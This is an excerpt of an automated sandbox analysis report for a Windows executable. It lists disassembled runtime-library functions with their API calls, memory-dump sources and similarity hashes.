                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CB15A71900219DFCF14EFA8C8819AEBBB5FF14310F14416AEA11EB217D735EA61CB92
                                                                                                                                                                                                                                                                          Function 0088A53C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,008A0244,000000FF,?,0088A5FD,0088A4E4,?,0088A699,00000000), ref: 0088A571
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,008A0244,000000FF,?,0088A5FD,0088A4E4,?,0088A699,00000000), ref: 0088A583
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,008A0244,000000FF,?,0088A5FD,0088A4E4,?,0088A699,00000000), ref: 0088A5A5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                          • Opcode ID: ca63eb7b27fd81bb5e7b077452b5c5cacf07792027ac7987d6ac5fe7bea9f4e7
                                                                                                                                                                                                                                                                          • Instruction ID: 9027990c797eb427b1a3fc1988f9fbceef16400df1aa986bc128ca8852b94153
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca63eb7b27fd81bb5e7b077452b5c5cacf07792027ac7987d6ac5fe7bea9f4e7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA01A731900615AFEB059F80DC09FAE7BB8FB05711F040525E811E2AD0DB789D40CF91
                                                                                                                                                                                                                                                                          Function 00891BCD Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00891C52
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00891D1B
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00891D82
                                                                                                                                                                                                                                                                            • Part of subcall function 008904C1: HeapAlloc.KERNEL32(00000000,?,?,?,0088119F,?,?,008731F2,00001000,?,0087313A), ref: 008904F3
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00891D95
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00891DA2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0df5ff953d63976bf2f19710af97d508f2ff86b07f98cc8e9d552fef4c041784
                                                                                                                                                                                                                                                                          • Instruction ID: c044d81329905e2700ec53e0ed89513cec9d28037551a25445b1a2e2bcd95702
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0df5ff953d63976bf2f19710af97d508f2ff86b07f98cc8e9d552fef4c041784
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14517C7260520BAFEF21BFA4CC89EBB3BAAFF44714B1D0529F909D6151EB30DC508661
                                                                                                                                                                                                                                                                          Function 00871870 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseFileHandleSize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3849164406-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1a5fb7a751e4f6b806cbfd7930f3d9dcb982825c2729079abbe781554af49628
                                                                                                                                                                                                                                                                          • Instruction ID: 7a13ff80895e2b6a7bde2d1b6f9783480a1c6e825921638a39a22a19c4507510
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a5fb7a751e4f6b806cbfd7930f3d9dcb982825c2729079abbe781554af49628
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3719AB4D042488FDB04EFA8D59879DBBF0FF48304F10842AE899EB794D734A949CB52
                                                                                                                                                                                                                                                                          Function 0088388E Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32(?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 008838A2
                                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 008838C1
                                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 008838EF
                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 0088394A
                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 00883961
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 66001078-0
                                                                                                                                                                                                                                                                          • Opcode ID: 22e7f08da66dfece0034154846b2a22fe98e2fa323c9f2cd8f4099ed3b5f6d8c
                                                                                                                                                                                                                                                                          • Instruction ID: 0ee8844655fde97f7a3e6828e973265889d9eeae3c6d53b86b05b3564236ae6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22e7f08da66dfece0034154846b2a22fe98e2fa323c9f2cd8f4099ed3b5f6d8c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F416E71500A0ADFCB20EF69C98496AFBF4FF0AB10B504A29E446D7940E7B0FB85CB51
                                                                                                                                                                                                                                                                          Function 0088184C Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00881853
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0088185E
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 008818CC
                                                                                                                                                                                                                                                                            • Part of subcall function 00881755: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0088176D
                                                                                                                                                                                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00881879
                                                                                                                                                                                                                                                                          • _Yarn.LIBCPMT ref: 0088188F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                          • Opcode ID: bab2ce4dd75c1cef30fd6d44f349f771f2132cfd3a9f0f6d918f4de2467f3ed1
                                                                                                                                                                                                                                                                          • Instruction ID: 0fe3792988f97a3a744ddf72ffec65251e4ffa6fb483573b0cdce7468b681ecc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bab2ce4dd75c1cef30fd6d44f349f771f2132cfd3a9f0f6d918f4de2467f3ed1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401D475A002118BEB06FF64D84957C37B9FF86700B184419E81197791DF346E43CB82
                                                                                                                                                                                                                                                                          Function 0089AC01 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0089AC9D,00000000,?,008AEFA0,?,?,?,0089ABD4,00000004,InitializeCriticalSectionEx,008A4F0C,008A4F14), ref: 0089AC0E
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0089AC9D,00000000,?,008AEFA0,?,?,?,0089ABD4,00000004,InitializeCriticalSectionEx,008A4F0C,008A4F14,00000000,?,0089016C), ref: 0089AC18
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0089AC40
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                          • Opcode ID: 99f755f14312d43ba74392fcab9a2e3ba1c01e87b902648fc05e962d35ee179a
                                                                                                                                                                                                                                                                          • Instruction ID: 6ebbda8993139a3f60981bd67f24ca9de2d7d035fa193eec939aff5d59e1139f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99f755f14312d43ba74392fcab9a2e3ba1c01e87b902648fc05e962d35ee179a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AE04830684204BBFF182F50EC06F593E55FB11F45F184020F90CEC8E1E761D811CA8A
                                                                                                                                                                                                                                                                          Function 00898366 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 008983C9
                                                                                                                                                                                                                                                                            • Part of subcall function 008905D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00891D78,?,00000000,-00000008), ref: 00890632
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0089861B
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00898661
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00898704
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5f69084cbc73110eb3ce24beae850518fd3105a3b7d25fd511ba235405b02944
                                                                                                                                                                                                                                                                          • Instruction ID: 6e7718004c8736e119242c0f39899457a9d5684a593822f0eb80b390867f1a93
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f69084cbc73110eb3ce24beae850518fd3105a3b7d25fd511ba235405b02944
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34D178B5E00249EFDF15DFE8C8849ADBBB5FF4A314F28412AE516EB351DA30A941CB50
                                                                                                                                                                                                                                                                          Function 0088F84B Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                          • Opcode ID: 601c42ca085bdc05d7a9791fbbf74ed0f774deb52a0fbe3e8c797eaff0e7dc93
                                                                                                                                                                                                                                                                          • Instruction ID: 092c1d1af08c21ec24689d3d804586e7c163efe01d23fb186b11bffee4702225
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 601c42ca085bdc05d7a9791fbbf74ed0f774deb52a0fbe3e8c797eaff0e7dc93
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B251E272604206AFEB28AF18DD41B7EBBA4FF48714F144539EA05C7692E731EC80CB91
                                                                                                                                                                                                                                                                          Function 00896192 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 008905D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00891D78,?,00000000,-00000008), ref: 00890632
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 008961F6
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 008961FD
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00896237
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0089623E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6266cd46c425570dbef5f2b4cd5828e843ddf56fe98055727fca2ccabc820762
                                                                                                                                                                                                                                                                          • Instruction ID: f214d81f0bf845ee4db6b0dccb7e007e05cac1ade1aecb92d1e163e0c5f30eae
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6266cd46c425570dbef5f2b4cd5828e843ddf56fe98055727fca2ccabc820762
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E219271604209AFDF20FFA5C88182AB7A9FF543647188529F91AD7651FB30EC20CBA1
                                                                                                                                                                                                                                                                          Function 008872A2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5e20cac9c9cc1a66c0a9a74a81e5ff32a6d400568f117845d22eda346bdc7383
                                                                                                                                                                                                                                                                          • Instruction ID: e7ec5f6e5c2bbe5eccabc580511fb94b3c284434f6382091b1f25b27e7b62089
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e20cac9c9cc1a66c0a9a74a81e5ff32a6d400568f117845d22eda346bdc7383
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3219271608209AFDB20FFA5C881D6AB7B9FF503647604528FD16D7751E730EC00A7A2
                                                                                                                                                                                                                                                                          Function 00897588 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00897590
                                                                                                                                                                                                                                                                            • Part of subcall function 008905D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00891D78,?,00000000,-00000008), ref: 00890632
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008975C8
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008975E8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7d1dcde98f96ddd90a304c673ffd8987c16d3f32e3b15bee27c9848686d7b30c
                                                                                                                                                                                                                                                                          • Instruction ID: ef4a21da9e725d7ed52f21b1324b22f95755c57a23e1a993ddea37e2bd7c27c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d1dcde98f96ddd90a304c673ffd8987c16d3f32e3b15bee27c9848686d7b30c
